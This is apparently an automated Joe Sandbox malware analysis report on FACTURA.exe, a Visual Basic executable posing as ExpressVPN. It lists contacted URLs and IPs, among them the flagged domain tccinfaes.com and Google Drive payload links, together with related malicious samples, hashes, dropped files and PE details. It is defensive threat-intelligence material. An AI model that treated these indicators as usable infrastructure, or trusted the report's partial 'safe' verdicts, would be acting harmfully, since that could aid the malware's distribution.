                    http://mail.tccinfaes.comRegAsm.exe, 0000000D.00000002.7447125466.000000001E57B000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://AuRruF1eYt.comRegAsm.exe, 0000000D.00000002.7446378686.000000001E4F6000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7447423121.000000001E5A8000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000003.3844182107.000000001D041000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://127.0.0.1:HTTP/1.1RegAsm.exe, 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://x1.i.lencr.org/RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.13.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://DynDns.comDynDNSRegAsm.exe, 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://doc-04-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0o1nf9s1RegAsm.exe, 0000000D.00000003.2913191774.000000000168D000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000003.2913521401.00000000016C5000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000003.2909576563.00000000016C5000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7430184056.0000000001680000.00000004.00000020.sdmpfalse
                      high
                      http://cps.letsencrypt.org0RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpfalse
                        high
                        http://PBlDXJ.comRegAsm.exe, 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://x1.c.lencr.org/0RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://x1.i.lencr.org/0RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://AuRruF1eYt.comt-RegAsm.exe, 0000000D.00000002.7446378686.000000001E4F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://tccinfaes.comRegAsm.exe, 0000000D.00000002.7447125466.000000001E57B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-04-88-docs.googleusercontent.com/;RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpfalse
                          high
                          http://r3.o.lencr.org0RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://doc-04-88-docs.googleusercontent.com/RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpfalse
                            high
                            https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000D.00000002.7451445570.000000001E96F000.00000004.00000001.sdmpfalse
                              high
                              http://r3.i.lencr.org/0)RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://drive.google.com/dRegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpfalse
                                high
                                https://doc-04-88-docs.googleusercontent.com/%%doc-04-88-docs.googleusercontent.comRegAsm.exe, 0000000D.00000003.2913791866.00000000016E5000.00000004.00000001.sdmpfalse
                                  high

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  172.217.168.46
                                  drive.google.comUnited States
                                  15169GOOGLEUSfalse
                                  142.250.181.225
                                  googlehosted.l.googleusercontent.comUnited States
                                  15169GOOGLEUSfalse
                                  188.93.227.195
                                  tccinfaes.comPortugal
                                  8426CLARANET-ASClaraNETLTDGBtrue

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:1644
                                  Start date:13.10.2021
                                  Start time:16:15:26
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 13m 7s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:FACTURA.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                  Run name:Suspected Instruction Hammering
                                  Number of analysed new started processes analysed:24
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.spre.troj.spyw.evad.winEXE@5/5@4/3
                                  EGA Information:Failed
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 73
                                  • Number of non-executed functions: 13
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 51.105.236.244, 2.21.140.114, 20.199.120.182, 209.197.3.8, 40.125.122.151, 52.242.97.97, 52.242.101.226, 20.82.210.154, 92.123.195.35, 92.123.195.73, 20.50.102.62, 104.89.32.83, 8.248.143.254, 8.248.135.254, 8.248.149.254, 67.27.157.254, 8.253.207.121, 104.89.41.209
                                  • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, wns.notify.trafficmanager.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, slscr.update.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, sls.update.microsoft.com.akadns.net, wu-shim.trafficmanager.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  16:18:21API Interceptor2630x Sleep call for process: RegAsm.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  188.93.227.195Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                    ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                      FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                        COPIA DE PAGO.exeGet hashmaliciousBrowse
                                          orientite.exeGet hashmaliciousBrowse
                                            PO.exeGet hashmaliciousBrowse
                                              DDC50015.exeGet hashmaliciousBrowse
                                                Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                  DHL00051021_PDF.exeGet hashmaliciousBrowse
                                                    FACTURA.exeGet hashmaliciousBrowse
                                                      FACTURA.exeGet hashmaliciousBrowse
                                                        seeds.exeGet hashmaliciousBrowse
                                                          Product LIsts.exeGet hashmaliciousBrowse
                                                            FACTURA Y ALBARANES_pdf.exeGet hashmaliciousBrowse
                                                              Scan.exeGet hashmaliciousBrowse
                                                                Ticari Hesap #U00d6zetiniz.exeGet hashmaliciousBrowse
                                                                  Struggleres5.exeGet hashmaliciousBrowse
                                                                    BBVA-Confirming Remesas Aceptadas.exeGet hashmaliciousBrowse
                                                                      FACTURA.exeGet hashmaliciousBrowse
                                                                        FACTURA.exeGet hashmaliciousBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                          ASN

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          CLARANET-ASClaraNETLTDGBFra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          b3astmode.arm7Get hashmaliciousBrowse
                                                                          • 80.168.0.124
                                                                          jew.arm7Get hashmaliciousBrowse
                                                                          • 212.49.223.28
                                                                          sora.arm7Get hashmaliciousBrowse
                                                                          • 89.206.151.169
                                                                          FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          COPIA DE PAGO.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          sora.armGet hashmaliciousBrowse
                                                                          • 195.102.64.245
                                                                          LSCtJ6YbhBGet hashmaliciousBrowse
                                                                          • 195.102.64.215
                                                                          orientite.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          PO.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          DDC50015.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          UnHAnaAW.x86Get hashmaliciousBrowse
                                                                          • 212.49.223.21
                                                                          yR25n6pfMSGet hashmaliciousBrowse
                                                                          • 195.157.0.198
                                                                          Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          DHL00051021_PDF.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          FACTURA.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          FACTURA.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195
                                                                          JE91d4cv34Get hashmaliciousBrowse
                                                                          • 81.171.235.227
                                                                          seeds.exeGet hashmaliciousBrowse
                                                                          • 188.93.227.195

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          37f463bf4616ecd445d4a1937da06e19REQUIREMENT.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          Statement of Account.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          HUD-Closing-Statement.htmlGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          zrArDsoum0.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          correction HAWB.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          UZWdHg3hWA.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          LBJiq1QBaH.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          Statement of Account.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          Potvrda narudzbe u prilogu.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          art-1881052385.xlsGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          184285013-044310-sanlccjavap0003-7069_pdf (5).exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          DOC 10132021.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          WIRE ADVICE.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          WireCopy.htmlGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          UGS2021100716241.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          RFQ_Project 20211012 thyssenkrupp Industrial Solutions AG 6000358077_PDF.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          WireCopy.htmlGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225
                                                                          Rust_hack_v6.4.2_x64_stable.exeGet hashmaliciousBrowse
                                                                          • 172.217.168.46
                                                                          • 142.250.181.225

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1391
                                                                          Entropy (8bit):7.705940075877404
                                                                          Encrypted:false
                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):61157
                                                                          Entropy (8bit):7.995991509218449
                                                                          Encrypted:true
                                                                          SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                          MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                          SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                          SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                          SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):192
                                                                          Entropy (8bit):2.763386534099206
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFklghTl1fllXlE/zMcjgh/XNNX8RolJuRdyo1dlUKlGXJlDdt:kK5hTlC1UJdNMa8Rdy+UKcXP
                                                                          MD5:40BA52E8F24B1BAED3EF33DDC40376D7
                                                                          SHA1:E021BA35EED4206F32BF96A134ED85A5E015CB5E
                                                                          SHA-256:15724954CAA89A168000AA089B6FFB10D19ACB6F6067AE1CF5497FCCD97E2078
                                                                          SHA-512:392E48AEA08DFD67ED69C14E71E76EC52075D10BA74DD76CCC4B25C880CA0A2735AAEC255D00251336ABA50C0048733A9DA2A053798163537BBEF82D7CAB9C38
                                                                          Malicious:false
                                                                          Preview: p...... .........U?f`...(....................................................... ..........~...F...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):326
                                                                          Entropy (8bit):3.1084234392766255
                                                                          Encrypted:false
                                                                          SSDEEP:6:kK7zdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:TZ2kPlE99SNxAhUefit
                                                                          MD5:175F8D04CD734B65D0C4CAE1E096E578
                                                                          SHA1:ED0BE651ADC726429A0E16233657196F9C22231B
                                                                          SHA-256:93EF494D9E55F248554850CF029F1D74E3A343EF3682DCBEE8293823D40B839B
                                                                          SHA-512:211F1D1A100AFADC0673855B9EB8122BD23DBE75F167BF852C6B95323CDC190211C67AFFF10EDE70EEB7D0BB1D5F0625FE89681310547F9EC25CFC0204C16611
                                                                          Malicious:false
                                                                          Preview: p...... .........+;|`...(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...
                                                                          \Device\ConDrv
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):30
                                                                          Entropy (8bit):3.964735178725505
                                                                          Encrypted:false
                                                                          SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                          MD5:9F754B47B351EF0FC32527B541420595
                                                                          SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                          SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                          SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                          Malicious:false
                                                                          Preview: NordVPN directory not found!..

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):5.770492551220603
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:FACTURA.exe
                                                                          File size:98304
                                                                          MD5:d9b54bd175163eae11715a5b89b32aba
                                                                          SHA1:8a926c701db271e1f2edfec8890a865248e52d24
                                                                          SHA256:3e123fbdc89e8c9c59a0c5a3a1c2d8fda13f5d8551da654bef2f17f34f578075
                                                                          SHA512:315c96c4109d3cdcede665b6550b9c55799581a6c193efbb50a0185bf492cc2dde75597b3a8635924f17c43b2f887b10aa88636f4ae97051fb173435a8f1e925
                                                                          SSDEEP:1536:t1DeOJvAoJDsEzYRwBVRCFu3oCZTaQFus94kbbnLK3KKPD:t1zhAoJDNzYDQZ7cWLTK6KP
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...v.uQ.................@...0...............P....@........

                                                                          File Icon

                                                                          Icon Hash:69e1c892f664c884

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x4012b4
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x5175DA76 [Tue Apr 23 00:48:54 2013 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:3d3cd1bd8dcc611a5734bf41f4e1a6a6

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          push 0041044Ch
                                                                          call 00007FE4B4711AA3h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          xor byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          inc eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [ecx-4F77326Ch], al
                                                                          in eax, FAh
                                                                          inc ebp
                                                                          mov ecx, 1EE07E99h
                                                                          push esp
                                                                          pop edi
                                                                          mov ah, 00h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [ecx], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [edx+00h], al
                                                                          push es
                                                                          push eax
                                                                          add dword ptr [ecx], 42h
                                                                          jc 00007FE4B4711B27h
                                                                          insd
                                                                          insd
                                                                          imul ebp, dword ptr [edi+72h], 73h
                                                                          xor eax, 00AE3400h
                                                                          add eax, dword ptr [eax]
                                                                          add byte ptr [eax], al
                                                                          add bh, bh
                                                                          int3
                                                                          xor dword ptr [eax], eax
                                                                          cmp byte ptr [CCCB72A4h], ch
                                                                          les eax, fword ptr [1B56A145h]
                                                                          or bl, byte ptr [esi+esi*4-27h]
                                                                          cdq
                                                                          or al, 6Dh

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x140240x28.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x1c1a.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000xf0.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x134180x14000False0.508483886719data6.22648163803IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .data0x150000xcc40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x160000x1c1a0x2000False0.344970703125data3.68013439536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          CUSTOM0x1791c0x2feMS Windows icon resource - 1 icon, 32x32, 16 colorsEnglishUnited States
                                                                          CUSTOM0x1705e0x8beMS Windows icon resource - 1 icon, 32x32, 8 bits/pixelEnglishUnited States
                                                                          CUSTOM0x16d600x2feMS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixelEnglishUnited States
                                                                          RT_ICON0x164b80x8a8data
                                                                          RT_GROUP_ICON0x164a40x14data
                                                                          RT_VERSION0x161a00x304dataEnglishUnited States

                                                                          Imports

                                                                          DLLImport
                                                                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                          Version Infos

                                                                          DescriptionData
                                                                          Translation0x0409 0x04b0
                                                                          LegalCopyrightExpressVPN
                                                                          InternalNameHippa6
                                                                          FileVersion4.00
                                                                          CompanyNameExpressVPN
                                                                          LegalTrademarksExpressVPN
                                                                          CommentsExpressVPN
                                                                          ProductNameExpressVPN
                                                                          ProductVersion4.00
                                                                          FileDescriptionExpressVPN
